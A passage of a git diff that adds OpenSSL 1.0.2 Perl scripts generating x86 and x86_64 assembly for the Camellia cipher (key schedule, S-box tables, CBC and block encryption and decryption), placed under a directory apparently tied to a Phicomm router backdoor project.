+	&lea	($key,&DWP(128,$key));		# size optimization
+
+	####### process KA
+	&_saveround	(2,$key,-128,@T);	# KA<<<0
+	&_rotl128	(@T,15,6,@T);		# KA<<<15
+	&_rotl128	(@T,15,8,@T);		# KA<<<(15+15=30)
+	&_rotl128	(@T,15,12,@T[0],@T[1]);	# KA<<<(30+15=45)
+	&_rotl128	(@T,15,14,@T);		# KA<<<(45+15=60)
+	push		(@T,shift(@T));		# rotl128(@T,32);
+	&_rotl128	(@T,2,20,@T);		# KA<<<(60+32+2=94)
+	&_rotl128	(@T,17,24,@T);		# KA<<<(94+17=111)
+
+	####### process KL
+	&_loadround	(0,$key,-128,@T);	# load KL
+	&_rotl128	(@T,15,4,@T);		# KL<<<15
+	&_rotl128	(@T,30,10,@T);		# KL<<<(15+30=45)
+	&_rotl128	(@T,15,13,@T[2],@T[3]);	# KL<<<(45+15=60)
+	&_rotl128	(@T,17,16,@T);		# KL<<<(60+17=77)
+	&_rotl128	(@T,17,18,@T);		# KL<<<(77+17=94)
+	&_rotl128	(@T,17,22,@T);		# KL<<<(94+17=111)
+
+	while (@T[0] ne "eax")			# restore order
+	{   unshift	(@T,pop(@T));   }
+
+	&mov	("eax",3);			# 3 grandRounds
+	&jmp	(&label("done"));
+
+&set_label("2nd256",16);
+	&mov	($idx,&wparam(2));
+	&_saveround	(6,$idx,@T);		# temporary storage for KA!
+
+	&xor	(@T[0],&DWP(4*8+0,$idx));	# KA^KR
+	&xor	(@T[1],&DWP(4*8+4,$idx));
+	&xor	(@T[2],&DWP(5*8+0,$idx));
+	&xor	(@T[3],&DWP(5*8+4,$idx));
+
+	&mov	($idx,&DWP($step*8,$key));	# prefetch SIGMA[8]
+	&mov	(&swtmp(0),@T[0]);		# save s[0-3]
+	&mov	(&swtmp(1),@T[1]);
+	&mov	(&swtmp(2),@T[2]);
+	&mov	(&swtmp(3),@T[3]);
+	&Camellia_Feistel($step++);
+	&Camellia_Feistel($step++);
+	&mov	(@T[2],&swtmp(2));
+	&mov	(@T[3],&swtmp(3));
+
+	&mov	($key,&wparam(2));
+	&lea	($key,&DWP(128,$key));		# size optimization
+
+	####### process KB
+	&_saveround	(2,$key,-128,@T);	# KB<<<0
+	&_rotl128	(@T,30,10,@T);		# KB<<<30
+	&_rotl128	(@T,30,20,@T);		# KB<<<(30+30=60)
+	push		(@T,shift(@T));		# rotl128(@T,32);
+	&_rotl128	(@T,19,32,@T);		# KB<<<(60+32+19=111)
+
+	####### process KR
+	&_loadround	(4,$key,-128,@T);	# load KR
+	&_rotl128	(@T,15,4,@T);		# KR<<<15
+	&_rotl128	(@T,15,8,@T);		# KR<<<(15+15=30)
+	&_rotl128	(@T,30,18,@T);		# KR<<<(30+30=60)
+	push		(@T,shift(@T));		# rotl128(@T,32);
+	&_rotl128	(@T,2,26,@T);		# KR<<<(60+32+2=94)
+
+	####### process KA
+	&_loadround	(6,$key,-128,@T);	# load KA
+	&_rotl128	(@T,15,6,@T);		# KA<<<15
+	&_rotl128	(@T,30,14,@T);		# KA<<<(15+30=45)
+	push		(@T,shift(@T));		# rotl128(@T,32);
+	&_rotl128	(@T,0,24,@T);		# KA<<<(45+32+0=77)
+	&_rotl128	(@T,17,28,@T);		# KA<<<(77+17=94)
+
+	####### process KL
+	&_loadround	(0,$key,-128,@T);	# load KL
+	push		(@T,shift(@T));		# rotl128(@T,32);
+	&_rotl128	(@T,13,12,@T);		# KL<<<(32+13=45)
+	&_rotl128	(@T,15,16,@T);		# KL<<<(45+15=60)
+	&_rotl128	(@T,17,22,@T);		# KL<<<(60+17=77)
+	push		(@T,shift(@T));		# rotl128(@T,32);
+	&_rotl128	(@T,2,30,@T);		# KL<<<(77+32+2=111)
+
+	while (@T[0] ne "eax")			# restore order
+	{   unshift	(@T,pop(@T));   }
+
+	&mov	("eax",4);			# 4 grandRounds
+&set_label("done");
+	&lea	("edx",&DWP(272-128,$key));	# end of key schedule
+	&stack_pop(4);
+}
+&function_end("Camellia_Ekeygen");
+
+if ($OPENSSL) {
+# int private_Camellia_set_key (
+#		const unsigned char *userKey,
+#		int bits,
+#		CAMELLIA_KEY *key)
+&function_begin_B("private_Camellia_set_key");
+	&push	("ebx");
+	&mov	("ecx",&wparam(0));	# pull arguments
+	&mov	("ebx",&wparam(1));
+	&mov	("edx",&wparam(2));
+
+	&mov	("eax",-1);
+	&test	("ecx","ecx");
+	&jz	(&label("done"));	# userKey==NULL?
+	&test	("edx","edx");
+	&jz	(&label("done"));	# key==NULL?
+
+	&mov	("eax",-2);
+	&cmp	("ebx",256);
+	&je	(&label("arg_ok"));	# bits==256?
+	&cmp	("ebx",192);
+	&je	(&label("arg_ok"));	# bits==192?
+	&cmp	("ebx",128);
+	&jne	(&label("done"));	# bits!=128?
+&set_label("arg_ok",4);
+
+	&push	("edx");		# push arguments
+	&push	("ecx");
+	&push	("ebx");
+	&call	("Camellia_Ekeygen");
+	&stack_pop(3);
+
+	# eax holds grandRounds and edx points at where to put it
+	&mov	(&DWP(0,"edx"),"eax");
+	&xor	("eax","eax");
+&set_label("done",4);
+	&pop	("ebx");
+	&ret	();
+&function_end_B("private_Camellia_set_key");
+}
+
+@SBOX=(
+112,130, 44,236,179, 39,192,229,228,133, 87, 53,234, 12,174, 65,
+ 35,239,107,147, 69, 25,165, 33,237, 14, 79, 78, 29,101,146,189,
+134,184,175,143,124,235, 31,206, 62, 48,220, 95, 94,197, 11, 26,
+166,225, 57,202,213, 71, 93, 61,217,  1, 90,214, 81, 86,108, 77,
+139, 13,154,102,251,204,176, 45,116, 18, 43, 32,240,177,132,153,
+223, 76,203,194, 52,126,118,  5,109,183,169, 49,209, 23,  4,215,
+ 20, 88, 58, 97,222, 27, 17, 28, 50, 15,156, 22, 83, 24,242, 34,
+254, 68,207,178,195,181,122,145, 36,  8,232,168, 96,252,105, 80,
+170,208,160,125,161,137, 98,151, 84, 91, 30,149,224,255,100,210,
+ 16,196,  0, 72,163,247,117,219,138,  3,230,218,  9, 63,221,148,
+135, 92,131,  2,205, 74,144, 51,115,103,246,243,157,127,191,226,
+ 82,155,216, 38,200, 55,198, 59,129,150,111, 75, 19,190, 99, 46,
+233,121,167,140,159,110,188,142, 41,245,249,182, 47,253,180, 89,
+120,152,  6,106,231, 70,113,186,212, 37,171, 66,136,162,141,250,
+114,  7,185, 85,248,238,172, 10, 54, 73, 42,104, 60, 56,241,164,
+ 64, 40,211,123,187,201, 67,193, 21,227,173,244,119,199,128,158);
+
+sub S1110 { my $i=shift; $i=@SBOX[$i]; return $i<<24|$i<<16|$i<<8; }
+sub S4404 { my $i=shift; $i=($i<<1|$i>>7)&0xff; $i=@SBOX[$i]; return $i<<24|$i<<16|$i; }	
+sub S0222 { my $i=shift; $i=@SBOX[$i]; $i=($i<<1|$i>>7)&0xff; return $i<<16|$i<<8|$i; }	
+sub S3033 { my $i=shift; $i=@SBOX[$i]; $i=($i>>1|$i<<7)&0xff; return $i<<24|$i<<8|$i; }	
+
+&set_label("Camellia_SIGMA",64);
+&data_word(
+    0xa09e667f, 0x3bcc908b, 0xb67ae858, 0x4caa73b2,
+    0xc6ef372f, 0xe94f82be, 0x54ff53a5, 0xf1d36f1c,
+    0x10e527fa, 0xde682d1d, 0xb05688c2, 0xb3e6c1fd,
+    0,          0,          0,          0);
+&set_label("Camellia_SBOX",64);
+# tables are interleaved, remember?
+for ($i=0;$i<256;$i++) { &data_word(&S1110($i),&S4404($i)); }
+for ($i=0;$i<256;$i++) { &data_word(&S0222($i),&S3033($i)); }
+
+# void Camellia_cbc_encrypt (const void char *inp, unsigned char *out,
+#			size_t length, const CAMELLIA_KEY *key,
+#			unsigned char *ivp,const int enc);
+{
+# stack frame layout
+#             -4(%esp)		# return address	 0(%esp)
+#              0(%esp)		# s0			 4(%esp)
+#              4(%esp)		# s1			 8(%esp)
+#              8(%esp)		# s2			12(%esp)
+#             12(%esp)		# s3			16(%esp)
+#             16(%esp)		# end of key schedule	20(%esp)
+#             20(%esp)		# %esp backup
+my $_inp=&DWP(24,"esp");	#copy of wparam(0)
+my $_out=&DWP(28,"esp");	#copy of wparam(1)
+my $_len=&DWP(32,"esp");	#copy of wparam(2)
+my $_key=&DWP(36,"esp");	#copy of wparam(3)
+my $_ivp=&DWP(40,"esp");	#copy of wparam(4)
+my $ivec=&DWP(44,"esp");	#ivec[16]
+my $_tmp=&DWP(44,"esp");	#volatile variable [yes, aliases with ivec]
+my ($s0,$s1,$s2,$s3) = @T;
+
+&function_begin("Camellia_cbc_encrypt");
+	&mov	($s2 eq "ecx"? $s2 : "",&wparam(2));	# load len
+	&cmp	($s2,0);
+	&je	(&label("enc_out"));
+
+	&pushf	();
+	&cld	();
+
+	&mov	($s0,&wparam(0));	# load inp
+	&mov	($s1,&wparam(1));	# load out
+	#&mov	($s2,&wparam(2));	# load len
+	&mov	($s3,&wparam(3));	# load key
+	&mov	($Tbl,&wparam(4));	# load ivp
+
+	# allocate aligned stack frame...
+	&lea	($idx,&DWP(-64,"esp"));
+	&and	($idx,-64);
+
+	# place stack frame just "above mod 1024" the key schedule
+	# this ensures that cache associativity of 2 suffices
+	&lea	($key,&DWP(-64-63,$s3));
+	&sub	($key,$idx);
+	&neg	($key);
+	&and	($key,0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	($idx,$key);
+
+	&mov	($key,&wparam(5));	# load enc
+
+	&exch	("esp",$idx);
+	&add	("esp",4);		# reserve for return address!
+	&mov	($_esp,$idx);		# save %esp
+
+	&mov	($_inp,$s0);		# save copy of inp
+	&mov	($_out,$s1);		# save copy of out
+	&mov	($_len,$s2);		# save copy of len
+	&mov	($_key,$s3);		# save copy of key
+	&mov	($_ivp,$Tbl);		# save copy of ivp
+
+	&call   (&label("pic_point"));	# make it PIC!
+	&set_label("pic_point");
+	&blindpop($Tbl);
+	&lea    ($Tbl,&DWP(&label("Camellia_SBOX")."-".&label("pic_point"),$Tbl));
+
+	&mov	($idx,32);
+	&set_label("prefetch_sbox",4);
+		&mov	($s0,&DWP(0,$Tbl));
+		&mov	($s1,&DWP(32,$Tbl));
+		&mov	($s2,&DWP(64,$Tbl));
+		&mov	($s3,&DWP(96,$Tbl));
+		&lea	($Tbl,&DWP(128,$Tbl));
+		&dec	($idx);
+	&jnz	(&label("prefetch_sbox"));
+	&mov	($s0,$_key);
+	&sub	($Tbl,4096);
+	&mov	($idx,$_inp);
+	&mov	($s3,&DWP(272,$s0));		# load grandRounds
+
+	&cmp	($key,0);
+	&je	(&label("DECRYPT"));
+
+	&mov	($s2,$_len);
+	&mov	($key,$_ivp);
+	&shl	($s3,6);
+	&lea	($s3,&DWP(0,$s0,$s3));
+	&mov	($_end,$s3);
+
+	&test	($s2,0xFFFFFFF0);
+	&jz	(&label("enc_tail"));		# short input...
+
+	&mov	($s0,&DWP(0,$key));		# load iv
+	&mov	($s1,&DWP(4,$key));
+
+	&set_label("enc_loop",4);
+		&mov	($s2,&DWP(8,$key));
+		&mov	($s3,&DWP(12,$key));
+
+		&xor	($s0,&DWP(0,$idx));	# xor input data
+		&xor	($s1,&DWP(4,$idx));
+		&xor	($s2,&DWP(8,$idx));
+		&bswap	($s0);
+		&xor	($s3,&DWP(12,$idx));
+		&bswap	($s1);
+		&mov	($key,$_key);		# load key
+		&bswap	($s2);
+		&bswap	($s3);
+
+		&call	("_x86_Camellia_encrypt");
+
+		&mov	($idx,$_inp);		# load inp
+		&mov	($key,$_out);		# load out
+
+		&bswap	($s0);
+		&bswap	($s1);
+		&bswap	($s2);
+		&mov	(&DWP(0,$key),$s0);	# save output data
+		&bswap	($s3);
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($s2,$_len);		# load len
+
+		&lea	($idx,&DWP(16,$idx));
+		&mov	($_inp,$idx);		# save inp
+
+		&lea	($s3,&DWP(16,$key));
+		&mov	($_out,$s3);		# save out
+
+		&sub	($s2,16);
+		&test	($s2,0xFFFFFFF0);
+		&mov	($_len,$s2);		# save len
+	&jnz	(&label("enc_loop"));
+	&test	($s2,15);
+	&jnz	(&label("enc_tail"));
+	&mov	($idx,$_ivp);		# load ivp
+	&mov	($s2,&DWP(8,$key));	# restore last dwords
+	&mov	($s3,&DWP(12,$key));
+	&mov	(&DWP(0,$idx),$s0);	# save ivec
+	&mov	(&DWP(4,$idx),$s1);
+	&mov	(&DWP(8,$idx),$s2);
+	&mov	(&DWP(12,$idx),$s3);
+
+	&mov	("esp",$_esp);
+	&popf	();
+    &set_label("enc_out");
+	&function_end_A();
+	&pushf	();			# kludge, never executed
+
+    &set_label("enc_tail",4);
+	&mov	($s0,$key eq "edi" ? $key : "");
+	&mov	($key,$_out);			# load out
+	&push	($s0);				# push ivp
+	&mov	($s1,16);
+	&sub	($s1,$s2);
+	&cmp	($key,$idx);			# compare with inp
+	&je	(&label("enc_in_place"));
+	&align	(4);
+	&data_word(0xA4F3F689);	# rep movsb	# copy input
+	&jmp	(&label("enc_skip_in_place"));
+    &set_label("enc_in_place");
+	&lea	($key,&DWP(0,$key,$s2));
+    &set_label("enc_skip_in_place");
+	&mov	($s2,$s1);
+	&xor	($s0,$s0);
+	&align	(4);
+	&data_word(0xAAF3F689);	# rep stosb	# zero tail
+	&pop	($key);				# pop ivp
+
+	&mov	($idx,$_out);			# output as input
+	&mov	($s0,&DWP(0,$key));
+	&mov	($s1,&DWP(4,$key));
+	&mov	($_len,16);			# len=16
+	&jmp	(&label("enc_loop"));		# one more spin...
+
+#----------------------------- DECRYPT -----------------------------#
+&set_label("DECRYPT",16);
+	&shl	($s3,6);
+	&lea	($s3,&DWP(0,$s0,$s3));
+	&mov	($_end,$s0);
+	&mov	($_key,$s3);
+
+	&cmp	($idx,$_out);
+	&je	(&label("dec_in_place"));	# in-place processing...
+
+	&mov	($key,$_ivp);			# load ivp
+	&mov	($_tmp,$key);
+
+	&set_label("dec_loop",4);
+		&mov	($s0,&DWP(0,$idx));	# read input
+		&mov	($s1,&DWP(4,$idx));
+		&mov	($s2,&DWP(8,$idx));
+		&bswap	($s0);
+		&mov	($s3,&DWP(12,$idx));
+		&bswap	($s1);
+		&mov	($key,$_key);		# load key
+		&bswap	($s2);
+		&bswap	($s3);
+
+		&call	("_x86_Camellia_decrypt");
+
+		&mov	($key,$_tmp);		# load ivp
+		&mov	($idx,$_len);		# load len
+
+		&bswap	($s0);
+		&bswap	($s1);
+		&bswap	($s2);
+		&xor	($s0,&DWP(0,$key));	# xor iv
+		&bswap	($s3);
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+		&sub	($idx,16);
+		&jc	(&label("dec_partial"));
+		&mov	($_len,$idx);		# save len
+		&mov	($idx,$_inp);		# load inp
+		&mov	($key,$_out);		# load out
+
+		&mov	(&DWP(0,$key),$s0);	# write output
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($_tmp,$idx);		# save ivp
+		&lea	($idx,&DWP(16,$idx));
+		&mov	($_inp,$idx);		# save inp
+
+		&lea	($key,&DWP(16,$key));
+		&mov	($_out,$key);		# save out
+
+	&jnz	(&label("dec_loop"));
+	&mov	($key,$_tmp);		# load temp ivp
+    &set_label("dec_end");
+	&mov	($idx,$_ivp);		# load user ivp
+	&mov	($s0,&DWP(0,$key));	# load iv
+	&mov	($s1,&DWP(4,$key));
+	&mov	($s2,&DWP(8,$key));
+	&mov	($s3,&DWP(12,$key));
+	&mov	(&DWP(0,$idx),$s0);	# copy back to user
+	&mov	(&DWP(4,$idx),$s1);
+	&mov	(&DWP(8,$idx),$s2);
+	&mov	(&DWP(12,$idx),$s3);
+	&jmp	(&label("dec_out"));
+
+    &set_label("dec_partial",4);
+	&lea	($key,$ivec);
+	&mov	(&DWP(0,$key),$s0);	# dump output to stack
+	&mov	(&DWP(4,$key),$s1);
+	&mov	(&DWP(8,$key),$s2);
+	&mov	(&DWP(12,$key),$s3);
+	&lea	($s2 eq "ecx" ? $s2 : "",&DWP(16,$idx));
+	&mov	($idx eq "esi" ? $idx : "",$key);
+	&mov	($key eq "edi" ? $key : "",$_out);	# load out
+	&data_word(0xA4F3F689);	# rep movsb		# copy output
+	&mov	($key,$_inp);				# use inp as temp ivp
+	&jmp	(&label("dec_end"));
+
+    &set_label("dec_in_place",4);
+	&set_label("dec_in_place_loop");
+		&lea	($key,$ivec);
+		&mov	($s0,&DWP(0,$idx));	# read input
+		&mov	($s1,&DWP(4,$idx));
+		&mov	($s2,&DWP(8,$idx));
+		&mov	($s3,&DWP(12,$idx));
+
+		&mov	(&DWP(0,$key),$s0);	# copy to temp
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&bswap	($s0);
+		&mov	(&DWP(12,$key),$s3);
+		&bswap	($s1);
+		&mov	($key,$_key);		# load key
+		&bswap	($s2);
+		&bswap	($s3);
+
+		&call	("_x86_Camellia_decrypt");
+
+		&mov	($key,$_ivp);		# load ivp
+		&mov	($idx,$_out);		# load out
+
+		&bswap	($s0);
+		&bswap	($s1);
+		&bswap	($s2);
+		&xor	($s0,&DWP(0,$key));	# xor iv
+		&bswap	($s3);
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+
+		&mov	(&DWP(0,$idx),$s0);	# write output
+		&mov	(&DWP(4,$idx),$s1);
+		&mov	(&DWP(8,$idx),$s2);
+		&mov	(&DWP(12,$idx),$s3);
+
+		&lea	($idx,&DWP(16,$idx));
+		&mov	($_out,$idx);		# save out
+
+		&lea	($idx,$ivec);
+		&mov	($s0,&DWP(0,$idx));	# read temp
+		&mov	($s1,&DWP(4,$idx));
+		&mov	($s2,&DWP(8,$idx));
+		&mov	($s3,&DWP(12,$idx));
+
+		&mov	(&DWP(0,$key),$s0);	# copy iv
+		&mov	(&DWP(4,$key),$s1);
+		&mov	(&DWP(8,$key),$s2);
+		&mov	(&DWP(12,$key),$s3);
+
+		&mov	($idx,$_inp);		# load inp
+
+		&lea	($idx,&DWP(16,$idx));
+		&mov	($_inp,$idx);		# save inp
+
+		&mov	($s2,$_len);		# load len
+		&sub	($s2,16);
+		&jc	(&label("dec_in_place_partial"));
+		&mov	($_len,$s2);		# save len
+	&jnz	(&label("dec_in_place_loop"));
+	&jmp	(&label("dec_out"));
+
+    &set_label("dec_in_place_partial",4);
+	# one can argue if this is actually required...
+	&mov	($key eq "edi" ? $key : "",$_out);
+	&lea	($idx eq "esi" ? $idx : "",$ivec);
+	&lea	($key,&DWP(0,$key,$s2));
+	&lea	($idx,&DWP(16,$idx,$s2));
+	&neg	($s2 eq "ecx" ? $s2 : "");
+	&data_word(0xA4F3F689);	# rep movsb	# restore tail
+
+    &set_label("dec_out",4);
+    &mov	("esp",$_esp);
+    &popf	();
+&function_end("Camellia_cbc_encrypt");
+}
+
+&asciz("Camellia for x86 by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86_64.pl
new file mode 100644
index 0000000..d94f46b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/camellia/asm/cmll-x86_64.pl
@@ -0,0 +1,1081 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Copyright (c) 2008 Andy Polyakov <appro@openssl.org>
+#
+# This module may be used under the terms of either the GNU General
+# Public License version 2 or later, the GNU Lesser General Public
+# License version 2.1 or later, the Mozilla Public License version
+# 1.1 or the BSD License. The exact terms of either license are
+# distributed along with this module. For further details see
+# http://www.openssl.org/~appro/camellia/.
+# ====================================================================
+
+# Performance in cycles per processed byte (less is better) in
+# 'openssl speed ...' benchmark:
+#
+#			AMD64	Core2	EM64T
+# -evp camellia-128-ecb	16.7	21.0	22.7
+# + over gcc 3.4.6	+25%	+5%	0%
+#
+# camellia-128-cbc	15.7	20.4	21.1
+#
+# 128-bit key setup	128	216	205	cycles/key
+# + over gcc 3.4.6	+54%	+39%	+15%
+#
+# Numbers in "+" rows represent performance improvement over compiler
+# generated code. Key setup timings are impressive on AMD and Core2
+# thanks to 64-bit operations being covertly deployed. Improvement on
+# EM64T, pre-Core2 Intel x86_64 CPU, is not as impressive, because it
+# apparently emulates some of 64-bit operations in [32-bit] microcode.
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+sub hi() { my $r=shift; $r =~ s/%[er]([a-d])x/%\1h/;    $r; }
+sub lo() { my $r=shift; $r =~ s/%[er]([a-d])x/%\1l/;
+                        $r =~ s/%[er]([sd]i)/%\1l/;
+                        $r =~ s/%(r[0-9]+)[d]?/%\1b/;   $r; }
+
+$t0="%eax";$t1="%ebx";$t2="%ecx";$t3="%edx";
+@S=("%r8d","%r9d","%r10d","%r11d");
+$i0="%esi";
+$i1="%edi";
+$Tbl="%rbp";	# size optimization
+$inp="%r12";
+$out="%r13";
+$key="%r14";
+$keyend="%r15";
+$arg0d=$win64?"%ecx":"%edi";
+
+# const unsigned int Camellia_SBOX[4][256];
+# Well, sort of... Camellia_SBOX[0][] is interleaved with [1][],
+# and [2][] - with [3][]. This is done to minimize code size.
+$SBOX1_1110=0;		# Camellia_SBOX[0]
+$SBOX4_4404=4;		# Camellia_SBOX[1]
+$SBOX2_0222=2048;	# Camellia_SBOX[2]
+$SBOX3_3033=2052;	# Camellia_SBOX[3]
+
+sub Camellia_Feistel {
+my $i=@_[0];
+my $seed=defined(@_[1])?@_[1]:0;
+my $scale=$seed<0?-8:8;
+my $j=($i&1)*2;
+my ($s0,$s1,$s2,$s3)=(@S[($j)%4],@S[($j+1)%4],@S[($j+2)%4],@S[($j+3)%4]);
+
+$code.=<<___;
+	xor	$s0,$t0				# t0^=key[0]
+	xor	$s1,$t1				# t1^=key[1]
+	movz	`&hi("$t0")`,$i0		# (t0>>8)&0xff
+	movz	`&lo("$t1")`,$i1		# (t1>>0)&0xff
+	mov	$SBOX3_3033($Tbl,$i0,8),$t3	# t3=SBOX3_3033[0]
+	mov	$SBOX1_1110($Tbl,$i1,8),$t2	# t2=SBOX1_1110[1]
+	movz	`&lo("$t0")`,$i0		# (t0>>0)&0xff
+	shr	\$16,$t0
+	movz	`&hi("$t1")`,$i1		# (t1>>8)&0xff
+	xor	$SBOX4_4404($Tbl,$i0,8),$t3	# t3^=SBOX4_4404[0]
+	shr	\$16,$t1
+	xor	$SBOX4_4404($Tbl,$i1,8),$t2	# t2^=SBOX4_4404[1]
+	movz	`&hi("$t0")`,$i0		# (t0>>24)&0xff
+	movz	`&lo("$t1")`,$i1		# (t1>>16)&0xff
+	xor	$SBOX1_1110($Tbl,$i0,8),$t3	# t3^=SBOX1_1110[0]
+	xor	$SBOX3_3033($Tbl,$i1,8),$t2	# t2^=SBOX3_3033[1]
+	movz	`&lo("$t0")`,$i0		# (t0>>16)&0xff
+	movz	`&hi("$t1")`,$i1		# (t1>>24)&0xff
+	xor	$SBOX2_0222($Tbl,$i0,8),$t3	# t3^=SBOX2_0222[0]
+	xor	$SBOX2_0222($Tbl,$i1,8),$t2	# t2^=SBOX2_0222[1]
+	mov	`$seed+($i+1)*$scale`($key),$t1	# prefetch key[i+1]
+	mov	`$seed+($i+1)*$scale+4`($key),$t0
+	xor	$t3,$t2				# t2^=t3
+	ror	\$8,$t3				# t3=RightRotate(t3,8)
+	xor	$t2,$s2
+	xor	$t2,$s3
+	xor	$t3,$s3
+___
+}
+
+# void Camellia_EncryptBlock_Rounds(
+#		int grandRounds,
+#		const Byte plaintext[],
+#		const KEY_TABLE_TYPE keyTable,
+#		Byte ciphertext[])
+$code=<<___;
+.text
+
+# V1.x API
+.globl	Camellia_EncryptBlock
+.type	Camellia_EncryptBlock,\@abi-omnipotent
+.align	16
+Camellia_EncryptBlock:
+	movl	\$128,%eax
+	subl	$arg0d,%eax
+	movl	\$3,$arg0d
+	adcl	\$0,$arg0d	# keyBitLength==128?3:4
+	jmp	.Lenc_rounds
+.size	Camellia_EncryptBlock,.-Camellia_EncryptBlock
+# V2
+.globl	Camellia_EncryptBlock_Rounds
+.type	Camellia_EncryptBlock_Rounds,\@function,4
+.align	16
+.Lenc_rounds:
+Camellia_EncryptBlock_Rounds:
+	push	%rbx
+	push	%rbp
+	push	%r13
+	push	%r14
+	push	%r15
+.Lenc_prologue:
+
+	#mov	%rsi,$inp		# put away arguments
+	mov	%rcx,$out
+	mov	%rdx,$key
+
+	shl	\$6,%edi		# process grandRounds
+	lea	.LCamellia_SBOX(%rip),$Tbl
+	lea	($key,%rdi),$keyend
+
+	mov	0(%rsi),@S[0]		# load plaintext
+	mov	4(%rsi),@S[1]
+	mov	8(%rsi),@S[2]
+	bswap	@S[0]
+	mov	12(%rsi),@S[3]
+	bswap	@S[1]
+	bswap	@S[2]
+	bswap	@S[3]
+
+	call	_x86_64_Camellia_encrypt
+
+	bswap	@S[0]
+	bswap	@S[1]
+	bswap	@S[2]
+	mov	@S[0],0($out)
+	bswap	@S[3]
+	mov	@S[1],4($out)
+	mov	@S[2],8($out)
+	mov	@S[3],12($out)
+
+	mov	0(%rsp),%r15
+	mov	8(%rsp),%r14
+	mov	16(%rsp),%r13
+	mov	24(%rsp),%rbp
+	mov	32(%rsp),%rbx
+	lea	40(%rsp),%rsp
+.Lenc_epilogue:
+	ret
+.size	Camellia_EncryptBlock_Rounds,.-Camellia_EncryptBlock_Rounds
+
+.type	_x86_64_Camellia_encrypt,\@abi-omnipotent
+.align	16
+_x86_64_Camellia_encrypt:
+	xor	0($key),@S[1]
+	xor	4($key),@S[0]		# ^=key[0-3]
+	xor	8($key),@S[3]
+	xor	12($key),@S[2]
+.align	16
+.Leloop:
+	mov	16($key),$t1		# prefetch key[4-5]
+	mov	20($key),$t0
+
+___
+	for ($i=0;$i<6;$i++) { Camellia_Feistel($i,16); }
+$code.=<<___;
+	lea	16*4($key),$key
+	cmp	$keyend,$key
+	mov	8($key),$t3		# prefetch key[2-3]
+	mov	12($key),$t2
+	je	.Ledone
+
+	and	@S[0],$t0
+	or	@S[3],$t3
+	rol	\$1,$t0
+	xor	$t3,@S[2]		# s2^=s3|key[3];
+	xor	$t0,@S[1]		# s1^=LeftRotate(s0&key[0],1);
+	and	@S[2],$t2
+	or	@S[1],$t1
+	rol	\$1,$t2
+	xor	$t1,@S[0]		# s0^=s1|key[1];
+	xor	$t2,@S[3]		# s3^=LeftRotate(s2&key[2],1);
+	jmp	.Leloop
+
+.align	16
+.Ledone:
+	xor	@S[2],$t0		# SwapHalf
+	xor	@S[3],$t1
+	xor	@S[0],$t2
+	xor	@S[1],$t3
+
+	mov	$t0,@S[0]
+	mov	$t1,@S[1]
+	mov	$t2,@S[2]
+	mov	$t3,@S[3]
+
+	.byte	0xf3,0xc3		# rep ret
+.size	_x86_64_Camellia_encrypt,.-_x86_64_Camellia_encrypt
+
+# V1.x API
+.globl	Camellia_DecryptBlock
+.type	Camellia_DecryptBlock,\@abi-omnipotent
+.align	16
+Camellia_DecryptBlock:
+	movl	\$128,%eax
+	subl	$arg0d,%eax
+	movl	\$3,$arg0d
+	adcl	\$0,$arg0d	# keyBitLength==128?3:4
+	jmp	.Ldec_rounds
+.size	Camellia_DecryptBlock,.-Camellia_DecryptBlock
+# V2
+.globl	Camellia_DecryptBlock_Rounds
+.type	Camellia_DecryptBlock_Rounds,\@function,4
+.align	16
+.Ldec_rounds:
+Camellia_DecryptBlock_Rounds:
+	push	%rbx
+	push	%rbp
+	push	%r13
+	push	%r14
+	push	%r15
+.Ldec_prologue:
+
+	#mov	%rsi,$inp		# put away arguments
+	mov	%rcx,$out
+	mov	%rdx,$keyend
+
+	shl	\$6,%edi		# process grandRounds
+	lea	.LCamellia_SBOX(%rip),$Tbl
+	lea	($keyend,%rdi),$key
+
+	mov	0(%rsi),@S[0]		# load plaintext
+	mov	4(%rsi),@S[1]
+	mov	8(%rsi),@S[2]
+	bswap	@S[0]
+	mov	12(%rsi),@S[3]
+	bswap	@S[1]
+	bswap	@S[2]
+	bswap	@S[3]
+
+	call	_x86_64_Camellia_decrypt
+
+	bswap	@S[0]
+	bswap	@S[1]
+	bswap	@S[2]
+	mov	@S[0],0($out)
+	bswap	@S[3]
+	mov	@S[1],4($out)
+	mov	@S[2],8($out)
+	mov	@S[3],12($out)
+
+	mov	0(%rsp),%r15
+	mov	8(%rsp),%r14
+	mov	16(%rsp),%r13
+	mov	24(%rsp),%rbp
+	mov	32(%rsp),%rbx
+	lea	40(%rsp),%rsp
+.Ldec_epilogue:
+	ret
+.size	Camellia_DecryptBlock_Rounds,.-Camellia_DecryptBlock_Rounds
+
+.type	_x86_64_Camellia_decrypt,\@abi-omnipotent
+.align	16
+_x86_64_Camellia_decrypt:
+	xor	0($key),@S[1]
+	xor	4($key),@S[0]		# ^=key[0-3]
+	xor	8($key),@S[3]
+	xor	12($key),@S[2]
+.align	16
+.Ldloop:
+	mov	-8($key),$t1		# prefetch key[4-5]
